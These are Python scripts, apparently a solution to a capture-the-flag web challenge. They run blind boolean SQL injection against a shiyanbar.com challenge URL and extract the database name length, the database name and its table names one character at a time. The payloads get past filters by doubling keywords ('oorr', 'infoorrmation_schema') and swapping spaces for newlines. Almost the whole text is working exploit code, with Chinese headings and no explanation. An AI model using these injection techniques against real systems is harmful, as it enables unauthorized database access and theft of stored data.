import requests
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1, 30):
key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
r = requests.post(url, data = key).text
print(i)
if str1 in r :
print('length is %s'%i)
break
爆库
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
database = ''
for i in range(1,19):
for j in guess:
key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
database += j
print(j)
break
print(database)
爆表长
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
i = 1
while True:
flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
print('the length of tables is %s'%i)
break
i += 1
爆表
import requests
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
tables = ''
for i in range(1,12):
for j in guess:
flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i, j)
flag = flag.replace(' ', chr(0x0a))
key = {'id':flag}
r = requests.post(url, data=key).text
print(key)
if str1 in r:
tables += j
print(j)
break
print(tables)